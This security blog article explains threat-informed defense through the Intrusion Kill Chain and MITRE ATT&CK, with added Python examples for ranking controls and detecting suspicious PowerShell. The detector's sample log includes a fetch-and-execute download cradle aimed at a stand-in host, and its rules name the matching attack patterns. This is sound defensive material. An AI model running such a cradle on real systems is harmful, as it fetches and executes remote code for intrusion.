
Threat-informed controls
In our last two articles, we talked about why you need a security map and how the first strategic step on your journey is passive preventative controls: configuration decisions and best practices that everybody should follow regardless of the threat landscape.
The next strategy involves awareness and action: deploying preventative controls based on known adversary behavior. This is where threat-informed controls come in. We have to stop guessing what adversaries might do and start looking at what they really do.
What is a Threat-informed control?
A threat-informed control is a security decision or safeguard you choose because you have proof that adversaries use a specific method.
Think of home security. You’ve put locks on your doors and windows (passive preventative controls). You could spend money on a high-tech roof alarm to stop people from dropping in through the chimney. But if local crime reports indicate burglars are breaking in via a common garage door opener whose signal is easy to clone, the roof alarm is a waste of money. A threat-informed choice would be to update or replace your garage door opener, or at a minimum make it your security practice to lock the door from the house to the garage every night.
Two threat-informed resources to know: Intrusion Kill Chain and MITRE ATT&CK
To effectively assess and implement threat-informed controls, you need to understand the Intrusion Kill Chain model and an invaluable public resource, the MITRE ATT&CK framework.
Intrusion Kill Chain
Created by Lockheed Martin, this model shows that a cyberattack is not a single event. It is a series of seven steps. If you break even one link in this chain, the whole attack fails (like the “hedgehog defence”).
The steps are:
Reconnaissance: The adversary researches your organization.
Weaponization: They create a "trap," like a malicious file.
Delivery: They send the trap to you (often via email).
Exploitation: The trap is triggered when someone clicks it.
Installation: The adversary’s software installs itself on your system.
Command and Control: The software "calls home" to the adversary for instructions.
Actions on Objectives: The adversary steals data or encrypts your files.
Why it matters: You don't have to be perfect at every step. You just have to stop the adversary at one of these stages to deny them success and buy yourself time to respond.
The MITRE ATT&CK Framework
If the Kill Chain is the "big picture," MITRE ATT&CK is the "adversary playbook." It is a large knowledge base that catalogs the specific moves adversaries have been observed using in real intrusions.
MITRE is a not-for-profit organization that manages several federally funded research and development centers for the US government. The ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework was started in 2013 out of a MITRE project.
Tactics: The "Why." These are the attacker’s technical goals (e.g., Initial Access, Persistence, Exfiltration).
Techniques: The "How." These are the specific methods used to achieve a tactic (e.g., Phishing, Brute Force, OS Credential Dumping).
Why ATT&CK changes the game
Before ATT&CK, security was often reactive. ATT&CK provides a periodic table of hacker movements, allowing organizations to:
Map defenses: See exactly which "squares" on the matrix they are protected against.
Threat hunt: Look for specific patterns of behavior rather than just waiting for an antivirus alert.
Communicate: It gave the industry a common language so that "Red Teams" (attackers) and "Blue Teams" (defenders) could speak the same dialect.
How this helps you as the resource-strapped defender
As an IT professional, your time and people power are limited. You probably can’t patch every vulnerability, and not every preventative control may be worth your effort in terms of risk reduction. Threat-informed defense helps you prioritize. You can say, "We have 50 vulnerabilities to fix, but these three are being used by adversaries right now to steal passwords. Let’s fix those first."
You may also find some controls can help mitigate the risk of multiple techniques across the tactical phases, making them more valuable to prioritize.
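One way to put this prioritization into practice, as an added example that is not part of the original article: rank candidate controls by how many currently observed techniques each one mitigates and how many Kill Chain steps that coverage spans. The technique IDs are real ATT&CK IDs, but the control-to-technique mapping, the Kill Chain placement and the "observed" set are constructed for illustration, not an official MITRE mapping.

```python
"""Rank candidate controls by threat-informed value: how many techniques that
adversaries are currently observed using each control mitigates, and how many
Kill Chain steps that coverage spans.

Added example, not from the article. Technique IDs are real ATT&CK IDs; the
mappings and the OBSERVED set are constructed, not an official MITRE mapping."""
from typing import Dict, List, Set, Tuple

# Constructed: each ATT&CK technique and the Kill Chain step it typically occupies.
KILL_CHAIN_STEP: Dict[str, str] = {
    "T1566":     "Delivery",               # Phishing
    "T1204.002": "Exploitation",           # User Execution: Malicious File (macros)
    "T1059.001": "Installation",           # Command and Scripting Interpreter: PowerShell
    "T1003":     "Actions on Objectives",  # OS Credential Dumping
    "T1110":     "Actions on Objectives",  # Brute Force
}

# Constructed: candidate controls and the techniques each one mitigates.
CONTROLS: Dict[str, Set[str]] = {
    "Block Office macros":      {"T1204.002"},
    "Monitor PowerShell":       {"T1059.001"},
    "Limit local admin rights": {"T1003", "T1059.001"},
    "Chimney alarm":            set(),   # stops nothing adversaries actually do
}

# Constructed: techniques your threat intel says adversaries are using right now.
OBSERVED: Set[str] = {"T1566", "T1204.002", "T1059.001", "T1003"}

def rank_controls(controls, observed) -> List[Tuple[str, int, int]]:
    """Return (control, observed techniques mitigated, Kill Chain steps covered),
    most valuable first; ties broken by breadth across steps, then by name."""
    ranked = []
    for name, techs in controls.items():
        hits = techs & observed
        steps = {KILL_CHAIN_STEP[t] for t in hits}
        ranked.append((name, len(hits), len(steps)))
    ranked.sort(key=lambda r: (-r[1], -r[2], r[0]))
    return ranked

def uncovered_steps(chosen, controls, observed) -> Set[str]:
    """Kill Chain steps where an observed technique has no chosen control:
    the links you still cannot break."""
    mitigated = set().union(*(controls[c] for c in chosen))
    return {KILL_CHAIN_STEP[t] for t in observed - mitigated}

if __name__ == "__main__":
    ranking = rank_controls(CONTROLS, OBSERVED)
    for name, hits, steps in ranking:
        print(f"{name:26} mitigates {hits} observed technique(s) across {steps} step(s)")
    print("still uncovered:", sorted(uncovered_steps([ranking[0][0]], CONTROLS, OBSERVED)))
```

Feed it your own control list and the techniques from your latest threat intelligence; the "still uncovered" set tells you which Kill Chain links remain unbroken after your top picks.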
Examples of Threat-Informed Controls
Here are a few ways you can apply this today:
Block Microsoft Office macros: Adversaries love to use macros to deliver malware. Disabling them for most users is a threat-informed control because it breaks the "Delivery" link in the Kill Chain.
Monitor PowerShell usage: Adversaries often use PowerShell (a tool you already have, referred to as “living off the land”) to move around your network. By setting up an alert for unusual PowerShell commands, you are using threat-informed knowledge to catch them.
Limit admin rights: Most adversaries need "Admin" or "System" rights to finish their work. By removing local admin rights from your users, you make it much harder for an adversary to move from Step 4 (Exploitation) to Step 5 (Installation).
The great thing is that a lot of these controls do NOT require additional, expensive tooling; they are likely something you can implement with existing administrative capabilities.
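The PowerShell monitoring item above, as an added example that is not part of the original article: simple detection logic run over constructed process-creation log records, flagging the "living off the land" patterns (encoded commands, hidden windows, execution-policy bypass, download-and-execute cradles, Office spawning PowerShell) and suppressing a known administrative script via an allowlist. The log records and the allowlist path are constructed; the rules are illustrative starting points, not a complete detection set.

```python
"""Flag unusual PowerShell launches in process-creation logs.

Added example, not from the article. Records are constructed; the rules are
illustrative 'living off the land' indicators, not a complete detection set."""
import re
from typing import Dict, List, Tuple

# Constructed sample records, shaped like a process-creation log entry
# (what Sysmon event 1 or Windows event 4688 would carry).
SAMPLE_LOG: List[Dict[str, str]] = [
    {"ts": "2024-05-01T09:02:11", "user": "alice", "parent": "explorer.exe",
     "cmd": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"ts": "2024-05-01T09:15:42", "user": "bob", "parent": "WINWORD.EXE",
     "cmd": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -enc SQBFAFgA"},
    {"ts": "2024-05-01T10:01:05", "user": "svc_patch", "parent": "services.exe",
     "cmd": "powershell.exe -ExecutionPolicy Bypass -File C:\\patch\\install.ps1"},
    {"ts": "2024-05-01T11:30:00", "user": "carol", "parent": "OUTLOOK.EXE",
     "cmd": "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Assumption: scripts your own admins legitimately run with -ExecutionPolicy Bypass.
ALLOWED_SCRIPTS = {r"c:\patch\install.ps1"}

RULES: List[Tuple[str, re.Pattern]] = [
    # PowerShell accepts -e, -ec, -enc and -EncodedCommand for the same switch.
    ("encoded_command", re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s", re.I)),
    ("hidden_window",   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("policy_bypass",   re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    # Download primitive combined with an expression evaluator in one command line.
    ("download_cradle", re.compile(r"(?=.*(?:iex|invoke-expression))"
                                   r".*(?:downloadstring|downloadfile|invoke-webrequest|iwr)", re.I)),
]

def detect(records: List[Dict[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Return (ts, user, matched rule names) for every record that trips a rule."""
    alerts = []
    for r in records:
        cmd = r["cmd"]
        hits = [name for name, pat in RULES if pat.search(cmd)]
        if r["parent"].lower() in OFFICE_PARENTS:
            hits.append("office_parent")   # Office spawning PowerShell: the macro path
        m = re.search(r"-f(?:ile)?\s+(\S+)", cmd, re.I)
        if m and m.group(1).lower() in ALLOWED_SCRIPTS:
            hits = [h for h in hits if h != "policy_bypass"]   # known admin script
        if hits:
            alerts.append((r["ts"], r["user"], hits))
    return alerts

if __name__ == "__main__":
    for ts, user, hits in detect(SAMPLE_LOG):
        print(f"{ts} {user}: {', '.join(hits)}")
```

Script block logging (event 4104) gives you the decoded script text as well, which lets the same rules run on what actually executed rather than only on the command line.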
Maximize effort and impact with threat-informed controls
Threat-informed defense is about being smart with your resources. When you understand the Intrusion Kill Chain and use tools like MITRE ATT&CK, you move from being reactive to being proactive. And, like the “hedgehog defence”, you will slow and break the adversary attack progression.
Resources
Intrusion Kill Chain: https://en.wikipedia.org/wiki/Cyber_kill_chain
MITRE ATT&CK: https://attack.mitre.org/
